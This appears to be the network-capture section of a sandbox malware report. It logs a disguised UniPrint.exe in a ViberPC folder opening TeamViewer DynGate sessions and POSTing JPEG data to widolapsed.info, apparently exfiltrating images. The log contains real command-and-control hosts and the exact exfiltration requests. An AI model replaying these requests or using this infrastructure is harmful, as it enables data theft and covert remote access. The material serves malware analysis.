                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                      31192.168.2.34982245.153.241.148443C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe
                                                                                                      TimestampkBytes transferredDirectionData


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                      32192.168.2.34982345.153.241.148443C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe
                                                                                                      TimestampkBytes transferredDirectionData


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                      33192.168.2.34982445.153.241.148443C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe
                                                                                                      TimestampkBytes transferredDirectionData


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                      34192.168.2.34982545.153.241.148443C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe
                                                                                                      TimestampkBytes transferredDirectionData


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                      35192.168.2.34982645.153.241.148443C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe
                                                                                                      TimestampkBytes transferredDirectionData


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                      36192.168.2.34982745.153.241.148443C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe
                                                                                                      TimestampkBytes transferredDirectionData


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                      37192.168.2.34982845.153.241.148443C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe
                                                                                                      TimestampkBytes transferredDirectionData


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                      38192.168.2.34982945.153.241.148443C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe
                                                                                                      TimestampkBytes transferredDirectionData


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                      39192.168.2.34983045.153.241.148443C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe
                                                                                                      TimestampkBytes transferredDirectionData


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                      4192.168.2.34975645.153.241.148443C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe
                                                                                                      TimestampkBytes transferredDirectionData


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                      40192.168.2.34983145.153.241.148443C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe
                                                                                                      TimestampkBytes transferredDirectionData


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                      41192.168.2.34983245.153.241.148443C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe
                                                                                                      TimestampkBytes transferredDirectionData


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                      42192.168.2.34983345.153.241.148443C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe
                                                                                                      TimestampkBytes transferredDirectionData


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                      43192.168.2.34983445.153.241.148443C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe
                                                                                                      TimestampkBytes transferredDirectionData


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                      44192.168.2.349746185.188.32.2280C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe
                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                      Sep 15, 2021 13:45:21.084033966 CEST1051OUTGET /din.aspx?s=00000000&client=DynGate&rnd=37826655&p=10000001 HTTP/1.1
                                                                                                      Accept: */*
                                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)
                                                                                                      Host: master12.teamviewer.com
                                                                                                      Connection: Keep-Alive
                                                                                                      Cache-Control: no-cache
                                                                                                      Sep 15, 2021 13:45:21.104980946 CEST1051INHTTP/1.1 200 OK
                                                                                                      Pragma: no-cache
                                                                                                      Cache-control: no-cache, no-store
                                                                                                      Content-Type: application/octet-stream
                                                                                                      Content-length: 10
                                                                                                      Data Raw: 17 24 34 30 30 38 32 38 34 39
                                                                                                      Data Ascii: $40082849
                                                                                                      Sep 15, 2021 13:45:21.132512093 CEST1052OUTGET /dout.aspx?s=40082849&p=10000001&client=DynGate&data=FyQSawCjHqkys5MkoZ6aGJqbGZocGBMkoh6YEyagoZ6YPDKxsxoxMRizMZqcGy+Ym5wYGpuYGRsbkyakoh6YPDKxsxoxMRizMZqcGy+Ym5wYGpuYGRsbkyepnqu0txmXGJiTKx6YmpcYFxscG5AoqQ== HTTP/1.1
                                                                                                      Accept: */*
                                                                                                      Content-Type: application/octet-stream
                                                                                                      Content-Transfer-Encoding: binary
                                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)
                                                                                                      Host: master12.teamviewer.com
                                                                                                      Connection: Keep-Alive
                                                                                                      Cache-Control: no-cache
                                                                                                      Sep 15, 2021 13:45:21.153398991 CEST1052INHTTP/1.1 200 OK
                                                                                                      Pragma: no-cache
                                                                                                      Cache-control: no-cache, no-store
                                                                                                      Content-length: 0
                                                                                                      Sep 15, 2021 13:45:21.155066967 CEST1052OUTGET /din.aspx?s=40082849&client=DynGate&p=10000002 HTTP/1.1
                                                                                                      Accept: */*
                                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)
                                                                                                      Host: master12.teamviewer.com
                                                                                                      Connection: Keep-Alive
                                                                                                      Cache-Control: no-cache
                                                                                                      Sep 15, 2021 13:45:21.176011086 CEST1052INHTTP/1.1 200 OK
                                                                                                      Pragma: no-cache
                                                                                                      Cache-control: no-cache, no-store
                                                                                                      Content-Type: application/octet-stream
                                                                                                      Content-length: 16
                                                                                                      Data Raw: 17 24 13 0b 00 18 20 19 9c 98 98 18 9b 9c 1c 1c
                                                                                                      Data Ascii: $


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                      45192.168.2.349747185.188.32.2280C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe
                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                      Sep 15, 2021 13:45:21.207201958 CEST1053OUTGET /din.aspx?s=00000000&client=DynGate&rnd=78504903&p=10000001 HTTP/1.1
                                                                                                      Accept: */*
                                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)
                                                                                                      Host: master12.teamviewer.com
                                                                                                      Connection: Keep-Alive
                                                                                                      Cache-Control: no-cache
                                                                                                      Sep 15, 2021 13:45:21.228383064 CEST1053INHTTP/1.1 200 OK
                                                                                                      Pragma: no-cache
                                                                                                      Cache-control: no-cache, no-store
                                                                                                      Content-Type: application/octet-stream
                                                                                                      Content-length: 10
                                                                                                      Data Raw: 17 24 34 30 30 38 32 38 35 39
                                                                                                      Data Ascii: $40082859
                                                                                                      Sep 15, 2021 13:45:21.230412960 CEST1054OUTGET /dout.aspx?s=40082859&p=10000001&client=DynGate&data=FyQS7wAjHqmyuig6sTY0saWyvJMkoZ6aGJqbGZocGBMkoh6ZnJiYGJucHBwTJqSiHpg8MrGzGjExGLMxmpwbL5ibnBgam5gZGxuTKx6YmpcYFxscG5AoqZMhNLcwuTyegwEAAABSAAApKaCYgAIAAAiAAABb76jy6JCEtP10hWwK5JgAShY7zj+R7R3DOU3+0YZJRajqI5wj4APqnpqJTTfow2rFHUX7lb5rKPxXbMNzymnW3afsLjONOJOSFwYGgTrjCxDXlTyXTROrLUrNxoJ5e0wRdRUaIY3bkkZHP/DCc/GC84acwVg91URMKSdn0IIfWg== HTTP/1.1
                                                                                                      Accept: */*
                                                                                                      Content-Type: application/octet-stream
                                                                                                      Content-Transfer-Encoding: binary
                                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)
                                                                                                      Host: master12.teamviewer.com
                                                                                                      Connection: Keep-Alive
                                                                                                      Cache-Control: no-cache
                                                                                                      Sep 15, 2021 13:45:21.251317978 CEST1054INHTTP/1.1 200 OK
                                                                                                      Pragma: no-cache
                                                                                                      Cache-control: no-cache, no-store
                                                                                                      Content-length: 0
                                                                                                      Sep 15, 2021 13:45:21.256596088 CEST1054OUTGET /din.aspx?s=40082859&client=DynGate&p=10000002 HTTP/1.1
                                                                                                      Accept: */*
                                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)
                                                                                                      Host: master12.teamviewer.com
                                                                                                      Connection: Keep-Alive
                                                                                                      Cache-Control: no-cache
                                                                                                      Sep 15, 2021 13:45:21.277640104 CEST1055INHTTP/1.1 200 OK
                                                                                                      Pragma: no-cache
                                                                                                      Cache-control: no-cache, no-store
                                                                                                      Content-Type: application/octet-stream
                                                                                                      Content-length: 9
                                                                                                      Data Raw: 17 24 13 04 00 98 20 27 a5
                                                                                                      Data Ascii: $ '


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                      46192.168.2.349748185.188.32.2280C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe
                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                      Sep 15, 2021 13:45:21.307344913 CEST1055OUTGET /din.aspx?s=00000000&client=DynGate&rnd=78504903&p=10000001 HTTP/1.1
                                                                                                      Accept: */*
                                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)
                                                                                                      Host: master12.teamviewer.com
                                                                                                      Connection: Keep-Alive
                                                                                                      Cache-Control: no-cache
                                                                                                      Sep 15, 2021 13:45:21.328543901 CEST1056INHTTP/1.1 200 OK
                                                                                                      Pragma: no-cache
                                                                                                      Cache-control: no-cache, no-store
                                                                                                      Content-Type: application/octet-stream
                                                                                                      Content-length: 10
                                                                                                      Data Raw: 17 24 34 30 30 38 32 38 36 34
                                                                                                      Data Ascii: $40082864
                                                                                                      Sep 15, 2021 13:45:21.333331108 CEST1056OUTGET /dout.aspx?s=40082864&p=10000001&client=DynGate&data=FyQS8gCjHqmyuim0s7cwujq5MqWyvJMkoZ6aGJqbGZocGBMkoh6ZnJiYGJucHBwTJqSiHpg8MrGzGjExGLMxmpwbL5ibnBgam5gZGxuTKx6YmpcYFxscG5AoqZMhNLcwuTyegwEAAAASAAApKaCYgAIAAAiAAAB7ySFOURDklGN3FXhtz5fQYcmcXiwT9YXrd7SP4wIu0YyOFYq9yPUEQYpaG7+wnhbl5r+tU8j1VcHRkBZSOJG/A0Y7yY1YSgbi8gOUCGFRO/w26w+YKCZHaxwju7In6AFwX2azSetPIMUWj5HFTKPx6LGZM3a+27DQaxFWt7lD4A== HTTP/1.1
                                                                                                      Accept: */*
                                                                                                      Content-Type: application/octet-stream
                                                                                                      Content-Transfer-Encoding: binary
                                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)
                                                                                                      Host: master12.teamviewer.com
                                                                                                      Connection: Keep-Alive
                                                                                                      Cache-Control: no-cache
                                                                                                      Sep 15, 2021 13:45:21.354281902 CEST1056INHTTP/1.1 200 OK
                                                                                                      Pragma: no-cache
                                                                                                      Cache-control: no-cache, no-store
                                                                                                      Content-length: 0
                                                                                                      Sep 15, 2021 13:45:21.356128931 CEST1057OUTGET /din.aspx?s=40082864&client=DynGate&p=10000002 HTTP/1.1
                                                                                                      Accept: */*
                                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)
                                                                                                      Host: master12.teamviewer.com
                                                                                                      Connection: Keep-Alive
                                                                                                      Cache-Control: no-cache
                                                                                                      Sep 15, 2021 13:45:21.381381035 CEST1057INHTTP/1.1 200 OK
                                                                                                      Pragma: no-cache
                                                                                                      Cache-control: no-cache, no-store
                                                                                                      Content-Type: application/octet-stream
                                                                                                      Content-length: 9
                                                                                                      Data Raw: 17 24 13 04 00 98 20 27 a5
                                                                                                      Data Ascii: $ '


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                      47192.168.2.349749185.188.32.2280C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe
                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                      Sep 15, 2021 13:45:21.420521975 CEST1058OUTGET /din.aspx?s=00000000&client=DynGate&rnd=78504903&p=10000001 HTTP/1.1
                                                                                                      Accept: */*
                                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)
                                                                                                      Host: master12.teamviewer.com
                                                                                                      Connection: Keep-Alive
                                                                                                      Cache-Control: no-cache
                                                                                                      Sep 15, 2021 13:45:21.441457987 CEST1058INHTTP/1.1 200 OK
                                                                                                      Pragma: no-cache
                                                                                                      Cache-control: no-cache, no-store
                                                                                                      Content-Type: application/octet-stream
                                                                                                      Content-length: 10
                                                                                                      Data Raw: 17 24 34 30 30 38 32 38 37 33
                                                                                                      Data Ascii: $40082873
                                                                                                      Sep 15, 2021 13:45:21.443578959 CEST1059OUTGET /dout.aspx?s=40082873&p=10000001&client=DynGate&data=FyQS6QChtjSytzoeqisoqZMjHqY3s7S3EyOrnpgTI6umMrsyth6aGBgTJDSyMqe3NjS3Mqm6MLo6uZ6YEyQqKignqqoemRMkoZ6aGJqbGZocGBMkoh6ZnJiYGJucHBwTJbKyuDC2NLsynpiTJjC3M7qws7KetTCTJjSxsrc5sqo8uDKemBMmpKIemDwysbMaMTEYszGanBsvmJucGBqbmBkbG5MnN6ezILG6NLsypbKyuDC2NLsynpgTKTq3OjS2sp6ckym6uDg3uToysiMysLo6uTK5npiTKiGoJ6qqHpgTKx6YmpcYFxscG5AoqQ== HTTP/1.1
                                                                                                      Accept: */*
                                                                                                      Content-Type: application/octet-stream
                                                                                                      Content-Transfer-Encoding: binary
                                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)
                                                                                                      Host: master12.teamviewer.com
                                                                                                      Connection: Keep-Alive
                                                                                                      Cache-Control: no-cache
                                                                                                      Sep 15, 2021 13:45:21.465447903 CEST1059INHTTP/1.1 200 OK
                                                                                                      Pragma: no-cache
                                                                                                      Cache-control: no-cache, no-store
                                                                                                      Content-length: 0
                                                                                                      Sep 15, 2021 13:45:21.467319965 CEST1059OUTGET /din.aspx?s=40082873&client=DynGate&p=10000002 HTTP/1.1
                                                                                                      Accept: */*
                                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)
                                                                                                      Host: master12.teamviewer.com
                                                                                                      Connection: Keep-Alive
                                                                                                      Cache-Control: no-cache
                                                                                                      Sep 15, 2021 13:45:21.488471985 CEST1060INHTTP/1.1 200 OK
                                                                                                      Pragma: no-cache
                                                                                                      Cache-control: no-cache, no-store
                                                                                                      Content-Type: application/octet-stream
                                                                                                      Content-length: 430
                                                                                                      Data Raw: 17 24 13 a9 01 98 20 27 a5 af 98 98 18 18 18 2f 96 af 99 2f af 98 9c 1c 17 18 9b 99 17 18 9c 9c 17 18 9a 98 9d 1c 18 2f 99 99 18 99 99 af 98 af 96 98 af 98 17 18 17 18 17 18 2f af 98 9c 1a 97 18 9c 1c 17 19 99 17 19 99 2f 98 9c 1a 97 18 9c 1c 17 19 99 17 19 19 2f 98 2f 99 9c 98 98 18 9b 9c 1c 1c 2f 98 af 98 2f 98 2f 98 2f 98 9c 9a 19 9b 9c 9b 9b 19 1a af af 98 9c 1c 17 18 9b 99 17 18 9c 9c 17 18 9a 98 96 18 9a 9c 97 18 99 19 17 18 9c 19 17 19 18 98 16 19 18 99 97 19 19 1b 97 18 9c 1b 17 18 9a 1c 16 19 18 9b 97 18 9a 1b 17 19 19 97 18 9a 19 16 18 9c 1c 17 18 9b 99 17 19 19 99 97 18 9b 9b 16 19 18 99 97 19 19 1b 97 18 9b 19 97 18 99 99 16 18 9b 18 97 18 9a 9b 17 1b 1b 97 18 98 99 16 18 9c 1c 17 18 9b 99 17 19 19 9a 97 18 9a 98 96 19 9b 97 19 1a 99 17 19 19 1a 17 1b 1c 96 19 9b 97 19 1a 99 17 19 1a 1b 97 18 98 1c 96 19 9b 97 19 1a 99 17 19 19 99 17 18 98 1c 16 18 9b 9c 17 19 1a 9a 97 18 9a 9a 97 18 9c 19 96 18 9c 1c 17 18 9b 99 17 19 1a 1a 97 18 99 99 16 19 18 9b 97 18 9a 1b 17 1c 17 1b 99 16 18 9a 9c 97 1c 17 19 19 1c 97 19 19 9b 96 18 9a 9c 17 18 9b 9b 17 1c 1b 17 1c 16 19 18 9b 97 18 9a 1b 17 18 99 97 18 99 9b 16 18 9c 1c 17 18 9b 99 17 18 9c 99 17 18 98 19 16 18 9b 9c 17 19 1a 9a 97 18 9a 9a 17 18 99 9b af b2 b3 17 b1 31 98 33 9a a1 a4 b4 26 36 a8 18 21 a0 a0 a0 a0 af
                                                                                                      Data Ascii: $ '///////////13&6!


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                      48192.168.2.349750188.172.198.15180C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe
                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                      Sep 15, 2021 13:45:21.541134119 CEST1060OUTGET /din.aspx?s=00000000&m=fast&client=DynGate&rnd=78504903&p=10000001 HTTP/1.1
                                                                                                      Accept: */*
                                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)
                                                                                                      Host: 188.172.198.151
                                                                                                      Connection: Keep-Alive
                                                                                                      Cache-Control: no-cache
                                                                                                      Sep 15, 2021 13:45:21.574105978 CEST1060INHTTP/1.1 200 OK
                                                                                                      Pragma: no-cache
                                                                                                      Cache-control: no-cache, no-store
                                                                                                      Content-Type: application/octet-stream
                                                                                                      Content-length: 17
                                                                                                      Data Raw: 17 24 66 61 73 74 31 32 34 31 38 33 33 39
                                                                                                      Data Ascii: $fast12418339
                                                                                                      Sep 15, 2021 13:45:21.865210056 CEST1062OUTPOST /dout.aspx?s=12418339&p=10000002&client=DynGate HTTP/1.1
                                                                                                      Accept: */*
                                                                                                      Content-Type: application/octet-stream
                                                                                                      Content-Transfer-Encoding: binary
                                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)
                                                                                                      Host: 188.172.198.151
                                                                                                      Content-Length: 500000
                                                                                                      Connection: Keep-Alive
                                                                                                      Cache-Control: no-cache


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                      49192.168.2.349751188.172.198.15180C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe
                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                      Sep 15, 2021 13:45:21.703310013 CEST1061OUTPOST /dout.aspx?s=12418339&p=10000001&client=DynGate HTTP/1.1
                                                                                                      Accept: */*
                                                                                                      Content-Type: application/octet-stream
                                                                                                      Content-Transfer-Encoding: binary
                                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)
                                                                                                      Host: 188.172.198.151
                                                                                                      Content-Length: 3
                                                                                                      Connection: Keep-Alive
                                                                                                      Cache-Control: no-cache
                                                                                                      Sep 15, 2021 13:45:21.823175907 CEST1062INHTTP/1.1 200 OK
                                                                                                      Pragma: no-cache
                                                                                                      Cache-control: no-cache, no-store
                                                                                                      Content-length: 0
                                                                                                      Sep 15, 2021 13:45:21.865972042 CEST1063OUTGET /din.aspx?s=12418339&m=fast&client=DynGate&p=10000002 HTTP/1.1
                                                                                                      Accept: */*
                                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)
                                                                                                      Host: 188.172.198.151
                                                                                                      Connection: Keep-Alive
                                                                                                      Cache-Control: no-cache
                                                                                                      Sep 15, 2021 13:45:21.899944067 CEST1063INHTTP/1.1 200 OK
                                                                                                      Pragma: no-cache
                                                                                                      Cache-control: no-cache, no-store
                                                                                                      Content-Type: application/octet-stream
                                                                                                      Content-length: 500000
                                                                                                      Data Raw: 17 24 11 04 00 5f a6 01 2f
                                                                                                      Data Ascii: $_/


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                      5192.168.2.34975745.153.241.148443C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe
                                                                                                      TimestampkBytes transferredDirectionData


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                      6192.168.2.34975845.153.241.148443C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe
                                                                                                      TimestampkBytes transferredDirectionData


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                      7192.168.2.34976045.153.241.148443C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe
                                                                                                      TimestampkBytes transferredDirectionData


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                      8192.168.2.34976145.153.241.148443C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe
                                                                                                      TimestampkBytes transferredDirectionData


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                      9192.168.2.34976245.153.241.148443C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe
                                                                                                      TimestampkBytes transferredDirectionData


                                                                                                      HTTPS Proxied Packets

                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                      0192.168.2.34975245.153.241.148443C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe
                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                      2021-09-15 11:45:23 UTC0OUTPOST /B8C631A8/ HTTP/1.1
                                                                                                      Content-Length: 76431
                                                                                                      Content-Type: multipart/form-data; boundary=--------3259937207
                                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)
                                                                                                      Host: widolapsed.info
                                                                                                      Connection: Close
                                                                                                      Cache-Control: no-cache
                                                                                                      2021-09-15 11:45:23 UTC0OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 33 32 35 39 39 33 37 32 30 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6b 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 70 6c 61 69 6e 0d 0a 43 6f 6e 74 65 6e 74 2d 54 72 61 6e 73 66 65 72 2d 45 6e 63 6f 64 69 6e 67 3a 20 62 69 6e 61 72 79 0d 0a 0d 0a
                                                                                                      Data Ascii: ----------3259937207Content-Disposition: form-data; name="k"Content-Type: text/plainContent-Transfer-Encoding: binary
                                                                                                      2021-09-15 11:45:23 UTC0OUTData Raw: a5 92 91 d3 08 69 50 53 d9 bf 13 b1 de 34 5c e8 c9 44 42 2e d0 8b e2 e3 24 1a c2 fa f4 7b d0 89 4f 18 77 eb b7 d9 65 c2 ab d1 30 f2 ed 9b 03 ed 45 5f a0 e5 4a 09 b7 34 b7 66 02 2c 3f b3 3a 11 4d 32 e9 1b ba 67 c4 9a 41 17 16 5b 44 ee c8 9d 11 29 3e 29 21 57 a6 34 36 5a ba 08 71 8b f3 b5 1a b0 78 f8 a8 9a 4d ce ff 58 6d fa 05 ce 4a c5 5f 76 a3 3b b7 29 66 58 7c 2c c9 ac 7c 22 59 25 32 24 45 ef 7b
                                                                                                      Data Ascii: iPS4\DB.${Owe0E_J4f,?:M2gA[D)>)!W46ZqxMXmJ_v;)fX|,|"Y%2$E{
                                                                                                      2021-09-15 11:45:23 UTC0OUTData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 00 00 00 00 00 ff db 00 43 00 0d 09 0a 0b 0a 08 0d 0b 0a 0b 0e 0e 0d 0f 13 20 15 13 12 12 13 27 1c 1e 17 20 2e 29 31 30 2e 29 2d 2c 33 3a 4a 3e 33 36 46 37 2c 2d 40 57 41 46 4c 4e 52 53 52 32 3e 5a 61 5a 50 60 4a 51 52 4f ff db 00 43 01 0e 0e 0e 13 11 13 26 15 15 26 4f 35 2d 35 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f ff c0 00 11 08 04 00 05 00 03 01 22 00 02 11 01 03 11 01 ff c4 00 1f 00 00 01 05 01 01 01 01 01 01 00 00 00 00 00 00 00 00 01 02 03 04 05 06 07 08 09 0a 0b ff c4 00 b5 10 00 02 01 03 03 02 04 03 05 05 04 04 00 00 01 7d 01 02 03 00 04 11 05 12 21 31 41 06 13 51 61 07 22 71 14 32 81 91 a1 08
                                                                                                      Data Ascii: JFIFC ' .)10.)-,3:J>36F7,-@WAFLNRSR2>ZaZP`JQROC&&O5-5OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO"}!1AQa"q2
                                                                                                      2021-09-15 11:45:23 UTC16OUTData Raw: 05 4d 52 0b 5b b4 ba b4 bd 82 49 23 95 81 e2 26 6f e1 51 90 40 eb c5 79 0e bf a5 ff 00 64 6a 8f 6a 1c ba 63 72 16 52 a7 07 d4 1e f5 ec 92 db 2d ad e5 89 86 4b 8f 9e 62 ac 1e e1 dc 11 e5 b9 e8 49 1d 40 af 35 f8 91 ff 00 23 5b ff 00 d7 14 fe 55 70 56 7a 75 26 6e eb 5e 87 27 49 4e c0 a4 c5 6d 63 21 28 a5 c5 18 34 00 77 a2 8e 68 a0 02 8c d1 45 00 14 51 45 00 14 b4 51 4c 41 45 14 50 01 45 14 52 00 a2 8a 28 01 28 a5 a4 a0 61 45 14 b4 00 94 51 45 16 00 a2 96 8a 00 4c 52 d1 45 31 05 14 51 40 05 2d 14 50 01 45 14 50 20 a2 8a 29 80 52 d2 52 d0 01 45 14 50 02 d1 45 14 08 28 a2 8a 00 5a 28 a5 a6 20 a2 8a 29 80 52 d2 52 d0 01 4b 49 4b 4c 41 45 14 50 20 a2 96 8a 60 14 51 4a 28 00 14 51 4b 4c 41 45 14 50 01 4e a4 14 b4 c4 c5 a2 8a 29 a1 0b 45 25 14 c4 2d 2e 69 28 a1 30
                                                                                                      Data Ascii: MR[I#&oQ@ydjjcrR-KbI@5#[UpVzu&n^'INmc!(4whEQEQLAEPER((aEQELRE1Q@-PEP )RREPE(Z( )RRKIKLAEP `QJ(QKLAEPN)E%-.i(0
                                                                                                      2021-09-15 11:45:23 UTC32OUTData Raw: 64 81 8d 38 31 a8 85 3b 35 2d 14 a4 c9 43 9f 5a 70 99 87 46 35 08 34 b5 2e 28 b5 36 5a 5b 99 07 f1 1a 95 6f 1c 75 c1 aa 40 d3 b3 50 e9 c4 d1 55 91 7c 5e 7f 79 41 a5 f3 e1 6f bd 18 aa 19 a5 0c 6a 5d 24 5a aa cb db 6d 1f aa 62 93 ec 76 8d d0 e2 aa 86 34 e0 c6 a7 95 ad 99 4a 71 7b a2 53 a6 46 7e eb d3 1b 4b 6f e1 70 68 0e 7b 13 52 09 9c 7f 11 a2 f3 5d 43 96 9b e8 57 6d 3a 61 d0 66 a3 36 92 af 54 35 7c 5c c8 3a 9a 78 ba 6e e0 1a 3d a4 d0 7b 2a 6c cc 31 30 ea a7 f2 a6 ed 3e 86 b6 05 c2 9e a8 29 77 40 df 79 05 1e d9 f5 41 ec 13 d9 98 f8 3e 95 cd 78 b7 8b 64 1f f4 d3 fa 57 79 e4 db 37 6c 57 13 e3 a4 48 b6 2c 67 82 ff 00 d2 b5 a7 57 99 d8 ce 74 5c 6c cf 3e ae 8f c0 9f f2 1e 6f fa e2 7f f4 25 ae 7a b4 f4 0d 51 74 8b e7 b8 78 8c 9b a3 28 00 38 c1 c8 39 fd 2b 19 ab
                                                                                                      Data Ascii: d81;5-CZpF54.(6Z[ou@PU|^yAoj]$Zmbv4Jq{SF~Koph{R]CWm:af6T5|\:xn={*l10>)w@yA>xdWy7lWH,gWt\l>o%zQtx(89+
                                                                                                      2021-09-15 11:45:23 UTC48OUTData Raw: db 74 6c 7d 2b 3a 8a a5 87 a6 ba 19 3c 5d 67 d4 b6 da 85 cb fd e9 5b f3 a6 f9 d2 37 57 27 f1 aa f4 e5 ab f6 71 5b 22 55 69 bd d9 2e e2 7a 93 4b 9a 68 a5 a5 62 d4 9b 1d 4e 14 dc d2 e6 91 69 8e cd 38 1a 8e 9e 29 34 52 63 e9 45 34 52 d4 9a 26 3a 9c 29 80 d3 b2 29 14 98 ec d3 85 33 34 b9 35 2d 16 99 25 14 d0 4d 2f d4 d2 68 a4 c7 8a 5c 8a 8f 7a 0e ac 3f 3a 63 5c c0 9d 5c 1a 5c ac 39 d2 ea 59 07 e5 3f 4a e3 3c 51 ff 00 1f b1 7f d7 21 5d 31 d4 a0 5c 81 93 5c cf 89 4e 6e e1 3f f4 c8 7f 3a a8 c5 ad c1 4d 4a 5a 1c 5d 14 56 e5 e1 48 7c 2f a7 18 e5 d3 e3 79 a1 72 f1 bd a8 69 a5 3e 6b 0c 87 d8 71 80 3f bc 3a 57 03 76 b1 eb a5 73 12 94 33 2a b0 56 20 30 c3 00 7a f7 ae ab 54 82 de 4f 14 4d 6a 4d 84 b6 f6 e6 69 05 b5 b5 b7 94 c3 62 16 08 ec 11 73 9c 63 82 7b d5 5b 65 7d
                                                                                                      Data Ascii: tl}+:<]g[7W'q["Ui.zKhbNi8)4RcE4R&:))345-%M/h\z?:c\\\9Y?J<Q!]1\\Nn?:MJZ]VH|/yri>kq?:Wvs3*V 0zTOMjMibsc{[e}
